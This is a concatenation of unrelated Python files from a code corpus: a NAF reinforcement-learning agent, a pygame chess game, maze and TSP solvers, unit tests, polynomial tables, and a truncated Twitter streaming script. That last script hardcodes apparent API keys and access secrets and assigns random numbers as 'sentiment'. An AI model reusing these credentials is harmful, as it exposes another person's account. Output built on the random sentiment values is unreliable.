prio_info=dict(), noise_info=dict(),\n **nafnet_kwargs):\n '''\n :param sess: current tensorflow session\n :param env: open gym environment to be solved\n :param stat: statistic class to handle tensorflow and statitics\n :param discount: discount factor\n :param batch_size: batch size for the training\n :param learning_rate: learning rate\n :param max_steps: maximal steps per episode\n :param update_repeat: iteration per step of training\n :param max_episodes: maximum number of episodes\n :param tau: polyac averaging\n :param pretune: list of tuples of state action reward next state done\n :param prio_info: parameters to handle the prioritizing of the buffer\n :param nafnet_kwargs: keywords to handle the network\n :param noise_info: dict with noise_function\n '''\n self.pretune = pretune\n self.prio_info = prio_info\n self.per_flag = bool(self.prio_info)\n print('PER is:', self.per_flag)\n self.sess = sess\n self.env = env\n if 'noise_function' in noise_info:\n self.noise_function = noise_info.get('noise_function')\n else:\n self.noise_function = lambda nr: 1 / (nr + 1)\n\n if 'batch_info' in nafnet_kwargs:\n self.batch_function = nafnet_kwargs.get('batch_info')\n print(10 * '-', self.batch_function)\n else:\n self.batch_function = lambda nr: self.batch_size\n\n if 'decay_info' in nafnet_kwargs:\n self.decay_function = nafnet_kwargs.get('decay_info')\n print(10 * '-', self.decay_function)\n else:\n self.decay_function = lambda nr: 1\n\n if 'beta_decay' in prio_info:\n self.beta_decay_function = prio_info.get('beta_decay')\n elif self.per_flag:\n self.beta_decay_function = lambda nr: max(1e-12, prio_info.get('beta_start') - nr / 100)\n else:\n self.beta_decay_function = lambda nr: 1\n self.x_ph, self.a_ph, self.mu, self.V, self.Q, self.P, self.A, self.vars_pred \\\n = core.mlp_normalized_advantage_function(env.observation_space.shape, act_dim=env.action_space.shape,\n **nafnet_kwargs,\n scope='main')\n self.x_ph_targ, self.a_ph_targ, self.mu_targ, self.V_targ, self.Q_targ, self.P_targ, self.A_targ, \\\n self.vars_targ \\\n = core.mlp_normalized_advantage_function(env.observation_space.shape, act_dim=env.action_space.shape,\n **nafnet_kwargs,\n scope='target')\n self.stat = stat\n self.discount = discount\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.action_size = env.action_space.shape[0]\n self.obs_dim = env.observation_space.shape[0]\n\n self.max_steps = max_steps\n self.update_repeat = update_repeat\n self.max_episodes = max_episodes\n self.current_step = 0\n\n if not (self.per_flag):\n self.replay_buffer = ReplayBuffer(obs_dim=self.obs_dim, act_dim=self.action_size, size=int(1e6))\n else:\n self.replay_buffer = ReplayBufferPER(obs_dim=self.obs_dim, act_dim=self.action_size, size=int(1e6),\n prio_info=prio_info)\n\n with tf.name_scope('optimizer'):\n self.target_y = tf.placeholder(tf.float32, [None], name='target_y')\n self.per_weights = tf.placeholder(tf.float32, [None], name='per_weights')\n # self.loss = tf.reduce_mean(tf.squared_difference(self.target_y, tf.squeeze(self.Q)),\n # name='loss')\n self.loss = tf.losses.mean_squared_error(self.target_y, tf.squeeze(self.Q), weights=self.per_weights)\n self.optim = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n # self.gvs = self.optim.compute_gradients(self.loss)\n # self.modified_gvs = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in self.gvs]\n # self.train_op = self.optim.apply_gradients(self.modified_gvs)\n\n self.target_init = tf.group([tf.assign(v_targ, v_main)\n for v_main, v_targ in zip(self.vars_pred, self.vars_targ)])\n\n # Polyak averaging for target variables (previous soft update)\n polyak = 1 - tau\n self.target_update = tf.group([tf.assign(v_targ, polyak * v_targ + (1 - polyak) * v_main)\n for v_main, v_targ in zip(self.vars_pred, self.vars_targ)])\n self.losses = []\n self.vs = []\n\n def run(self, is_train=True):\n print('Training:', is_train)\n # tf.initialize_all_variables().run()\n self.stat.set_variables(self.vars_pred)\n self.stat.load_model() # including init\n # if is_train:\n # self.sess.run(self.target_init)\n\n # pretune------------------------------------------------------------------------------\n if not (self.pretune is None):\n scan_data = self.pretune\n print('Length of scan data is: ', len(scan_data))\n\n if scan_data:\n for i, data in enumerate(scan_data):\n o, a, r, o2, d, _ = data\n self.replay_buffer.store(o, a, r, o2, d)\n print(\"Number: \", i)\n print(o, a, r, o2, d)\n\n batch_size_temp = self.batch_size\n self.batch_size = 10\n for _ in range(10 * len(scan_data)):\n q, v, a, l = self.perceive()\n if self.stat:\n self.stat.on_step(a, r, d, q, v, a, l)\n\n self.batch_size = batch_size_temp\n # -------------------------------------------------------------------------\n\n for self.idx_episode in range(self.max_episodes):\n o = self.env.reset()\n\n for t in range(0, self.max_steps):\n # 1. predict\n a = self.predict(o, is_train)\n # 2. step\n o2, r, d, _ = self.env.step(a)\n if is_train:\n self.replay_buffer.store(o, a, r, o2, d)\n o = o2\n d = False if t == self.max_steps - 1 else d\n # 3. perceive\n self.current_step = t\n if is_train:\n pass\n q, v, a, l = self.perceive()\n if self.stat:\n self.stat.on_step(a, r, d, q, v, a, l)\n if d:\n break\n\n print('episode:', self.idx_episode, 'length:', t)\n def predict(self, state, is_train):\n u = self.sess.run(self.mu, feed_dict={self.x_ph: [state]})[0]\n if is_train:\n noise_scale = self.noise_function(self.idx_episode)\n return u + noise_scale * np.random.randn(self.action_size)\n else:\n return u\n\n def perceive(self):\n q_list = []\n v_list = []\n a_list = []\n l_list = []\n\n beta_decay = self.beta_decay_function(self.idx_episode)\n batch_size = self.batch_function(self.idx_episode)\n loss_decay = self.decay_function(self.idx_episode)\n\n for iteration in range(self.update_repeat):\n if self.per_flag:\n batch, priority_info = self.replay_buffer.sample_batch(batch_size=batch_size, beta=beta_decay)\n else:\n batch = self.replay_buffer.sample_batch(batch_size)\n\n o = batch['obs1']\n o2 = batch['obs2']\n a = batch['acts']\n r = batch['rews']\n\n if self.per_flag:\n w = priority_info[0]\n # print('weights', priority_info[1])\n else:\n w = np.ones(r.shape[-1])\n\n v = self.sess.run(self.V_targ, feed_dict={self.x_ph_targ: o2, self.a_ph_targ: a})\n target_y = self.discount * np.squeeze(v) + r\n\n _, l, q, v, a = self.sess.run([\n self.optim, self.loss,\n self.Q, self.V, self.A,\n ], {\n self.target_y: target_y,\n self.x_ph: o,\n self.a_ph: a,\n self.per_weights: w\n })\n\n q_list.extend(q)\n v_list.extend(v)\n a_list.extend(a)\n l_list.append(l)\n\n # self.target_network.soft_update_from(self.pred_network)\n\n if self.per_flag:\n # priorities = np.ones(priority_info[0].shape[-1]) * (abs(l) * 1 + 1e-7)\n factor = 1e-12 + l * (loss_decay)\n # print('fac', factor, loss_decay, beta_decay)\n priorities = np.ones(priority_info[0].shape[-1]) * factor\n # print('priorities', priorities)\n self.replay_buffer.update_priorities(idxes=priority_info[1], priorities=priorities)\n\n logger.debug(\"ep:,%s, q: %s, v: %s, a: %s, l: %s\" \\\n % (self.idx_episode, np.mean(q), np.mean(v), np.mean(a), np.mean(l)))\n self.sess.run(self.target_update)\n self.losses.append(np.mean(l))\n self.vs.append(np.mean(v))\n # print('batch_size', batch_size)\n return np.sum(q_list), np.sum(v_list), np.sum(a_list), np.sum(l_list)\n","sub_path":"pernaf/pernaf/naf.py","file_name":"naf.py","file_ext":"py","file_size_in_byte":12581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"292402218","text":"\"\"\"\n--> main driver file\n--> handle input data\n--> display current GameState object\n\"\"\"\nimport pygame as p\nfrom MyChess import ChessEngine\nfrom MyChess import SmartMoves\n\nWIDTH = HEIGHT = 480 # can use 400\nDIMENSION = 8 # 8x8 board\nSQ_SIZE = HEIGHT // DIMENSION\nMAX_FPS = 15 # for animation\nIMAGES = {}\nCOLORS = [p.Color('light gray'), p.Color('dark gray')]\n'''\nInitialize a global dictionary of images. This will be called exactly once in the main\n'''\n\n\ndef loadImages():\n pieces = ['wp', 'wR', 'wN', 'wB', 'wQ', 'wK', 'bp', 'bR', 'bN', 'bB', 'bQ', 'bK']\n for piece in pieces:\n IMAGES[piece] = p.transform.scale(p.image.load(\"images/\" + piece + \".png\"), (SQ_SIZE, SQ_SIZE))\n'''\nmain driver for our code. This will handle user input and updating the graphics\n'''\n\n\ndef main():\n p.init()\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n screen.fill(p.Color(\"white\"))\n gs = ChessEngine.GameState()\n validMoves = gs.getValidMoves() # store all current valid moves\n moveMade = False # flag for move made\n loadImages() # only once\n light = \"light gray\"\n dark = \"dark gray\"\n running = True\n animate = False\n gameOver = False\n playerOne = True # if white is human this is True\n playerTwo = True # if black is human this is True\n sqSelected = () # no square selected initially (row, col)\n playerClicks = [] # [(xi, yi), (xf, yf)]\n while running:\n humanTurn = (gs.whiteToMove and playerOne) or (not gs.whiteToMove and playerTwo)\n for e in p.event.get():\n if e.type == p.QUIT:\n running = False\n elif e.type == p.MOUSEBUTTONDOWN:\n if not gameOver and humanTurn:\n location = p.mouse.get_pos() # (x, y) location of mouse click\n col = location[0] // SQ_SIZE\n row = location[1] // SQ_SIZE\n if sqSelected == (row, col): # selecting same square twice\n sqSelected = () # ignore double clicks\n playerClicks = []\n else:\n sqSelected = (row, col)\n playerClicks.append(sqSelected)\n if len(playerClicks) == 2: # two clicks done\n move = ChessEngine.Move(playerClicks[0], playerClicks[1], gs.board)\n\n print(move.getChessNotations())\n print(move.moveID)\n for i in range(len(validMoves)):\n if move == validMoves[i]:\n if validMoves[i].isPawnPromotion:\n print(\"Enter choice\\nRook : R\\nBishop : B\\nKnight : N\\nQueen : Any else key\")\n pieceInput = True\n while pieceInput:\n promoteEvent = p.event.wait()\n if promoteEvent.type == p.QUIT:\n pieceInput = False\n elif promoteEvent.type == p.KEYDOWN:\n pieceInput = False\n if promoteEvent.key == p.K_r:\n print(\"you chose Rook\")\n validMoves[i].promoteTo = 'R'\n elif promoteEvent.key == p.K_b:\n print(\"you chose Bishop\")\n validMoves[i].promoteTo = 'B'\n elif promoteEvent.key == p.K_n:\n print(\"you chose Knight\")\n validMoves[i].promoteTo = 'N'\n else:\n print(\"you chose Queen\")\n validMoves[i].promoteTo = 'Q'\n else:\n pass\n gs.makeMove(validMoves[i])\n moveMade = True\n animate = True\n sqSelected = () # reset user clicks\n playerClicks = []\n if not moveMade:\n playerClicks = [sqSelected]\n elif e.type == p.KEYDOWN:\n if e.key == p.K_z:\n if not gameOver:\n gs.undoMove()\n gs.getValidMoves()\n moveMade = True\n animate = False\n gameOver = False\n elif e.key == p.K_0:\n light = \"light gray\"\n dark = \"dark gray\"\n elif e.key == p.K_1:\n light = \"#E9D298\"\n dark = \"#9B7655\"\n elif e.key == p.K_2:\n light = \"#77B5FE\"\n dark = \"blue\"\n elif e.key == p.K_3:\n light = \"pink\"\n dark = \"brown\"\n elif e.key == p.K_r: # reset board\n gs = ChessEngine.GameState()\n validMoves = gs.getValidMoves()\n sqSelected = ()\n playerClicks = []\n playerOne = False # if white is human this is True\n playerTwo = False # if black is human this is True\n moveMade = False\n animate = False\n gameOver = False\n if not humanTurn and not gameOver:\n move = SmartMoves.findBestMoveMinMax(gs, validMoves)\n # move = None\n if move is None:\n move = SmartMoves.randomAI(validMoves)\n gs.makeMove(move)\n moveMade = True\n animate = True\n if moveMade:\n if animate:\n animateMove(screen, gs.moveLog[-1], gs.board, clock)\n validMoves = gs.getValidMoves()\n if len(validMoves) == 0 and gs.inCheck:\n gs.checkMate = True\n gameOver = True\n elif len(validMoves) == 0 and not gs.inCheck:\n gs.staleMate = True\n gameOver = True\n print(\"white to move\" if gs.whiteToMove else \"black to move\")\n moveMade = False\n animate = False\n\n drawGameSate(screen, gs, validMoves, sqSelected, light, dark)\n\n if gs.checkMate:\n gameOver = True\n print(gs.whiteKingLocation)\n print(gs.blackKingLocation)\n if gs.whiteToMove:\n drawText(screen, \"Black wins by checkmate\")\n else:\n drawText(screen, \"White wins by checkmate\")\n elif gs.staleMate:\n gameOver = True\n drawText(screen, \"Draw by stalemate\")\n clock.tick(MAX_FPS)\n p.display.flip()\n\n\n'''\nHighlighting selected piece and possible moves of it\n'''\n\n\ndef highlightSquares(screen, gs, validMoves, sqSelected):\n lastStart = p.Surface((SQ_SIZE, SQ_SIZE))\n lastEnd = p.Surface((SQ_SIZE, SQ_SIZE))\n\n lastStart.set_alpha(100)\n lastEnd.set_alpha(100)\n\n lastStart.fill(p.Color('green'))\n lastEnd.fill(p.Color('light green'))\n captureAble = []\n if sqSelected != ():\n r, c = sqSelected\n if gs.board[r][c][0] == (\"w\" if gs.whiteToMove else \"b\"): # selected square can be moved\n # highlight selected square\n select = p.Surface((SQ_SIZE, SQ_SIZE))\n capture = p.Surface((SQ_SIZE, SQ_SIZE))\n possible = p.Surface((SQ_SIZE, SQ_SIZE))\n\n select.set_alpha(100) # transparency value\n capture.set_alpha(100)\n possible.set_alpha(100)\n\n select.fill(p.Color('#6699cc')) # fill color\n capture.fill(p.Color('red'))\n possible.fill(p.Color('yellow'))\n\n # highlight selected square\n screen.blit(select, (c * SQ_SIZE, r * SQ_SIZE))\n\n\n # highlight possible moves\n for move in validMoves:\n if (move.startRow == r and move.startCol == c) and (move.isEnpassantMove or move.pieceCaptured != \"--\"):\n screen.blit(capture, (move.endCol * SQ_SIZE, move.endRow * SQ_SIZE))\n captureAble.append((move.endRow, move.endCol))\n elif move.startRow == r and move.startCol == c:\n screen.blit(possible, (move.endCol * SQ_SIZE, move.endRow * SQ_SIZE))\n\n # highlight last move\n if len(gs.moveLog) != 0:\n lastStartRow, lastStartCol = gs.moveLog[-1].startRow, gs.moveLog[-1].startCol\n lastEndRow, lastEndCol = gs.moveLog[-1].endRow, gs.moveLog[-1].endCol\n screen.blit(lastStart, (lastStartCol * SQ_SIZE, lastStartRow * SQ_SIZE))\n if (lastEndRow, lastEndCol) not in captureAble:\n screen.blit(lastEnd, (lastEndCol * SQ_SIZE, lastEndRow * SQ_SIZE))\n\n\n'''\nresponsible for all the graphics within a current game state\n'''\n\n\ndef drawGameSate(screen, gs, validMoves, sqSelected, light, dark):\n drawBoard(screen, light, dark) # draw squares on board\n highlightSquares(screen, gs, validMoves, sqSelected)\n drawPieces(screen, gs.board) # draw pieces on top of those squares\n\n\n'''\nDraw the squares on the board\n'''\n\n\ndef drawBoard(screen, light, dark):\n colors = [p.Color(light), p.Color(dark)]\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n color = colors[((r + c) % 2)]\n p.draw.rect(screen, color, p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\n'''\nDraw the pieces on the board using the current GameState.board\n'''\n\n\ndef drawPieces(screen, board):\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n piece = board[r][c]\n if piece != \"--\":\n screen.blit(IMAGES[piece], p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\ndef animateMove(screen, move, board, clock):\n coordinates = [] # list of co-ordinates the animation will move through\n dR = move.endRow - move.startRow\n dC = move.endCol - move.startCol\n framesPerSquare = 1 # frames to move one square\n frameCount = (abs(dR) + abs(dC)) * framesPerSquare\n for frame in range(frameCount + 1):\n r, c = (move.startRow + dR * frame / frameCount, move.startCol + dC * frame / frameCount)\n drawBoard(screen, 'light gray', 'dark gray')\n drawPieces(screen, board)\n # erase piece moved from its ending square\n color = COLORS[(move.endRow + move.endCol) % 2]\n endSquare = p.Rect(move.endCol * SQ_SIZE, move.endRow * SQ_SIZE, SQ_SIZE, SQ_SIZE)\n p.draw.rect(screen, color, endSquare)\n if move.pieceCaptured != \"--\":\n if move.isEnpassantMove:\n enpassantRow = (move.endRow + 1) if move.pieceMoved[0] == 'w' else (move.endRow - 1)\n endSquare = p.Rect(move.endCol * SQ_SIZE, enpassantRow * SQ_SIZE, SQ_SIZE, SQ_SIZE)\n screen.blit(IMAGES[move.pieceCaptured], endSquare)\n # draw moving piece\n if not move.isEnpassantMove and move.pieceMoved != \"--\":\n screen.blit(IMAGES[move.pieceMoved], p.Rect(c * SQ_SIZE, r * SQ_SIZE, SQ_SIZE, SQ_SIZE))\n p.display.flip()\n clock.tick(60)\n\n\ndef drawText(screen, text):\n font = p.font.SysFont(\"Open Sans\", 32, True, False)\n textShadow = font.render(text, 0, p.Color('Dark Gray'))\n textLocation = p.Rect(0, 0, WIDTH, HEIGHT).move(WIDTH / 2 - textShadow.get_width() / 2,\n HEIGHT / 2 - textShadow.get_height() / 2)\n screen.blit(textShadow, textLocation)\n textObject = font.render(text, 0, p.Color('Black'))\n screen.blit(textObject, textLocation.move(-2, -2))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MyChess/ChessMain.py","file_name":"ChessMain.py","file_ext":"py","file_size_in_byte":12068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"198397035","text":"# 레벨2-연습: 가장 큰 정사각형 찾기\n# https://programmers.co.kr/learn/courses/30/lessons/12905\n\nfrom collections import deque\n\ndef solution(maps):\n x_move = [1, 0, -1, 0]\n y_move = [0, 1, 0, -1]\n x_h, y_h = (len(maps[0]), len(maps))\n queue = deque([(0, 0, 1)])\n while queue:\n x, y, d = queue.popleft()\n for i in range(4):\n nx = x + x_move[i]\n ny = y + y_move[i]\n if nx > -1 and ny > -1 and nx < x_h and ny < y_h:\n if maps[ny][nx] == 1 or maps[ny][nx] > d + 1:\n maps[ny][nx] = d + 1\n if nx == x_h - 1 and ny == y_h - 1:\n return d + 1\n queue.append((nx, ny, d + 1))\n return -1\n\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]])) # 11\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,0],[0,0,0,0,1]])) # -1\n\n","sub_path":"programmers/level2/1844_게임맵최단거리.py","file_name":"1844_게임맵최단거리.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"640145803","text":"import unittest\nfrom yaml import safe_load\n\nfrom relaty.relat import Relat\nfrom relaty.story import Story\n\n\nclass TestRelaty(unittest.TestCase):\n\n def setUp(self):\n super()\n\n document = \"\"\"\n title: A title\n screens:\n - Hello, how are you?\n - These are two screens\n options:\n - title: option 1\n screens:\n - option 1 screen 1\n - option 1 screen 2\n options:\n - title: option 1.1\n screens:\n - option 1.1 screen 1\n - option 1.1 screen 2\n - FIN\n - title: option 1.2\n screens:\n - option 1.2 screen 1\n - option 1.2 screen 2\n options:\n - title: option 1.2.1\n screens:\n - option 1.2.1 screen 1\n - option 1.2.1 screen 2\n - FIN\n - title: option 1.2.2\n screens:\n - option 1.2.2 screen 1\n - option 1.2.2 screen 2\n - FIN\n - title: Option 2\n screens:\n - option 2 screen 1\n - option 2 screen 2\n - FIN\n \"\"\"\n\n converted_document = safe_load(document)\n self.relat_from_document = Relat.create_from_document(\n converted_document)\n self.story_from_document = self.relat_from_document.story\n\n relat_title = \"A test Relat\"\n self.empty_relat = Relat(title=relat_title)\n\n def test_story_should_have_a_title(self):\n document = \"\"\"\n otro:otro\n \"\"\"\n self.assertRaises(TypeError, Relat.create_from_document, document)\n\n def test_screens_are_created_correctly(self):\n\n # Screens are created correctly\n self.assertEqual(len(self.story_from_document.screens), 2)\n\n def test_options_are_created_correctly(self):\n self.assertEqual(len(self.story_from_document.options), 2)\n\n def test_cant_create_relat_with_invalidid_options(self):\n failed_document = \"\"\"\n no: tienen\n sentido: estos\n cosos: no?\n \"\"\"\n\n self.assertRaises(\n TypeError, Relat.create_from_document, failed_document)\n\n def test_relat_has_correct_number_of_endings(self):\n expected_endings = 4\n actual_endings = self.relat_from_document.get_number_endings\n\n self.assertEqual(expected_endings, actual_endings)\n\n def test_can_create_empty_relat(self):\n self.assertEqual(self.empty_relat.title, \"A test Relat\")\n\n def test_a_screens_can_be_added_to_story(self):\n screens = [\n \"Screen 1\",\n \"Screen 2\"\n ]\n\n for screen in screens:\n self.empty_relat.add_screen(screen)\n\n self.assertEqual(len(self.empty_relat.screens), 2)\n\n for actual, expected in zip(screens, self.empty_relat.screens):\n self.assertEqual(actual, expected)\n\n def test_an_option_can_be_added_to_relat(self):\n self.empty_relat.add_screen(\"A screen\")\n\n self.empty_relat.add_option(\n Story(\n title=\"Option 1\"\n )\n )\n\n # Test the option was added\n self.assertEqual(\n len(self.empty_relat.options),\n 1\n )\n\n # Test the added option has the given title\n self.assertEqual(\n self.empty_relat.options[0].title,\n \"Option 1\"\n )\n\n def test_add_screen_to_story(self):\n\n empty_story = Story(title=\"A story\", screens=[])\n\n screen = \"A screen\"\n\n empty_story.add_screen(screen)\n\n # Test screen was added\n self.assertEqual(\n len(empty_story.screens),\n 1\n )\n\n # Test added screen is given screen\n self.assertEqual(\n empty_story.screens[0],\n screen\n )\n\n def test_an_option_can_be_added_to_story(self):\n empty_story = Story(title=\"A story\", screens=[])\n\n screen = \"A screen\"\n\n empty_story.add_screen(screen)\n\n option = Story(title=\"Option 1\", screens=[\"An option screen\"])\n\n empty_story.add_option(option)\n\n # Test screen was added\n self.assertEqual(\n len(empty_story.options),\n 1\n )\n\n # Test added screen is given screen\n self.assertEqual(\n empty_story.options[0].title,\n \"Option 1\"\n )\n\n def test_an_option_can_be_retrieved_navigating_story(self):\n\n option1 = self.story_from_document.get_option(0)\n\n self.assertEqual(\n option1.title,\n \"option 1\"\n )\n\n option2 = self.story_from_document.get_option(1)\n\n self.assertEqual(\n option2.title,\n \"Option 2\"\n )\n\n option121 = self.story_from_document\\\n .get_option(0).get_option(1).get_option(0)\n\n self.assertEqual(\n option121.title,\n \"option 1.2.1\"\n )\n\n def test_shallow_equals_returns_true_if_title_and_screens_are_equal(self):\n o1 = Story(title=\"Option 1\", screens=[\"O1 screen\"])\n\n s1 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s1.options = [o1]\n\n s2 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n options=[]\n )\n\n s3 = Story(\n title=\"Story 1\",\n screens=[\"Screen\"],\n options=[]\n )\n\n self.assertTrue(\n s1.shallow_equal(s2)\n )\n\n self.assertFalse(\n s1.shallow_equal(s3)\n )\n\n def test_equals_returns_true_if_storys_are_similar_and_shallow_equal(self):\n o1 = Story(title=\"Option 1\", screens=[\"O1 screen\"])\n\n s1 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s1.options = [o1]\n\n s2 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n s2.options = [o1]\n\n s3 = Story(\n title=\"Story 1\",\n screens=[\"Screen\"],\n options=[]\n )\n\n s4 = Story(\n title=\"Story 1\",\n screens=[\"Screen 1\"],\n )\n\n self.assertNotEqual(\n s1, 1\n )\n\n self.assertNotEqual(\n s1, s3\n )\n\n self.assertNotEqual(\n s1, s4\n )\n\n self.assertEqual(\n s1, s2\n )\n\n def test_navigating_with_valid_paths_works(self):\n path1 = [0, 0]\n\n self.assertEqual(self.relat_from_document.navigate(\n path1).screens[0], \"option 1.1 screen 1\")\n","sub_path":"test/test_relaty.py","file_name":"test_relaty.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"162360696","text":"from django.core.urlresolvers import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom .models import Produto\n\n\nclass TestProdutoList(APITestCase):\n def test_create_produto(self):\n url = reverse('produtos:produto-list')\n data = {'nome':'teste', 'preco':13.5}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Produto.objects.count(), 1)\n self.assertEqual(Produto.objects.get().nome, 'teste')\n\n def test_get_produto(self):\n url = reverse('produtos:produto-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass TestProdutoDetails(APITestCase):\n def setUp(self):\n Produto.objects.create(nome='teste')\n\n def test_get_produto(self):\n url = reverse('produtos:produto-details', kwargs={'pk':Produto.objects.get().id})\n response = self.client.get(url, data=None, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_update_produto(self):\n produto = Produto.objects.get()\n url = reverse('produtos:produto-details', kwargs={'pk':produto.id})\n data = {'nome':'teste2', 'preco':13}\n response = self.client.put(url, data, format='json')\n self.assertEqual(Produto.objects.get().nome, 'teste2')\n self.assertEqual(Produto.objects.get().preco, 13)\n\n def test_delete_produto(self):\n url = reverse('produtos:produto-details', kwargs={'pk':Produto.objects.get().id})\n response = self.client.delete(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n","sub_path":"produtos/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"322819580","text":"\"\"\"\nA module containing LUTs for primitive polynomials over GF(2^2).\n\nSage:\n def integer(coeffs, order):\n i = 0\n for d, c in enumerate(coeffs[::-1]):\n i += (c.integer_representation() * order**d)\n return i\n\n order = 2**2\n degree = 1\n list_ = []\n R = GF(order, repr=\"int\")[\"x\"]\n for f in R.polynomials(degree):\n # For some reason `is_primitive()` crashes on f(x) = x\n if f.coefficients(sparse=False) == [0, 1]:\n continue\n if f.is_monic() and f.is_primitive():\n list_.append(f.coefficients(sparse=False)[::-1])\n\n # Sort in lexicographical order\n if not is_prime(order):\n list_ = sorted(list_, key=lambda item: integer(item, order))\n\n print(f\"PRIMITIVE_POLYS_{order}_{degree} = {list_}\")\n\"\"\"\n\n# LUT items are poly coefficients in degree-descending order\n\nPRIMITIVE_POLYS_4_1 = [\n [1, 2],\n [1, 3],\n]\n\nPRIMITIVE_POLYS_4_2 = [\n [1, 1, 2],\n [1, 1, 3],\n [1, 2, 2],\n [1, 3, 3],\n]\n\nPRIMITIVE_POLYS_4_3 = [\n [1, 1, 1, 2],\n [1, 1, 1, 3],\n [1, 1, 2, 3],\n [1, 1, 3, 2],\n [1, 2, 1, 3],\n [1, 2, 2, 2],\n [1, 2, 3, 2],\n [1, 2, 3, 3],\n [1, 3, 1, 2],\n [1, 3, 2, 2],\n [1, 3, 2, 3],\n [1, 3, 3, 3],\n]\n","sub_path":"tests/polys/luts/primitive_polys_4.py","file_name":"primitive_polys_4.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55012258","text":"\"\"\"\nReads Adj Matrix from file\nExpects this kind of syntax\nFirst Line:N=Number of vertex\nNext N lines: Row of numbers separated with \",\"\nLast 2 lines: Start vertex,End vertex\n\nIN:Filname-String\nRETURNS:ADJ MATRIX,START CITY,END CITY\n\"\"\"\ndef readFromFile(fileName):\n f=open(fileName)\n matrix=[]\n a=int(f.readline())\n for x in range(a):\n x=f.readline()\n z=x.split(\",\")\n list=[]\n for s in z:\n list.append(int(s))\n matrix.append(list)\n startCity=int(f.readline())-1\n destCity=int(f.readline())-1\n return matrix,startCity,destCity\n\n\"\"\"\nFind the shortest path form one vertex to another\n\nIN:Adj Matrix,start,end-optional\n(If parameter end is not set it will go through all the vertexes)\nOUT:Cost of the path,and the visited\n\"\"\"\nMAX_VAL=9999999999\ndef TCP(matrix,start, end=None):\n actualNode = start\n visited = [actualNode]\n cost = 0\n while end not in visited and len(visited) < len(matrix):\n lst = [el for el in matrix[actualNode]]\n while lst.index(min(lst)) in visited:\n lst[lst.index(min(lst))] = MAX_VAL\n for x in lst:\n if(x==0):\n lst[lst.index(x)]=MAX_VAL\n cost += min(lst)\n actualNode = lst.index(min(lst))\n visited.append(lst.index(min(lst)))\n if end is None:\n cost += matrix[visited[-1]][start]\n return (cost,visited)\n\n\nif __name__==\"__main__\":\n matrix,start,stop=readFromFile(\"easy_01_tsp.txt\")\n print(TCP(matrix,start))","sub_path":"TCP.py","file_name":"TCP.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"495654054","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport tweepy\nimport random\n# consumer key, consumer secret, access token, access secret.\nckey = \"p3W58bKWtFTj2XvYoH6UFtSCh\"\ncsecret = \"aFzMrIbXFmi5vfGz0bR4tXlJ1C7r8KGsI134eEDEVez5EZlB98\"\natoken = \"3238419461-XhoFQm3LWcSSqpVv99f8KoyZm03d4vvOztglL4r\"\nasecret = \"x5yu3Qf55dcz1Uzmc5HEXIfGhYiMcesQM9OyTS9T3p6V6\"\ncount=0\nf=open(\"tweet_data.json\", 'w+')\nf.write('[')\nclass listener(StreamListener):\n def on_data(self, data):\n all_data = json.loads(data)\n tweet = all_data[\"text\"]\n d={}\n '''\n {\"lang\": \"en\", \"created_at\": \"Wed Jun 22 12:54:44 +0000 2016\",\n \"popularity\": 124, \"screen_name\": \"jodhaanirudh\", \"name\": \"anirudhjodha\", \"follower_count\": 24,\n \"Friends\": 99, \"Location\": null, \"id\": 745600913272872960, \"text\": \"RT @digvijaya_28: A complete U Turn by Modi Sarkar.\n Every time UPA Govt opened up the Economy there was a barrage of criticism from Modi BJ\\u2026\"}\n '''\n d['text']=tweet\n\n d['created_at']=all_data['created_at']\n d['screen_name']=all_data['user']['screen_name']\n d['id']=all_data['id']\n d['popularity']=all_data['user']['favourites_count']\n d['Friends']=all_data['user']['friends_count']\n d['lang']=all_data['lang']\n d['follower_count']=all_data['user']['followers_count']\n d['Location'] = all_data['user']['location']\n d['name']=all_data['user']['name']\n d['time zone']=all_data['user']['time_zone']\n d['sentiment'] = random.randint(0, 500)\n #d['urls']=all_data['urls']\n json.dump(d, f)\n f.write(',')\n return (True)\n\n\n def on_error(self, status):\n print(status)\n\n\ndef collect(entity):\n auth = 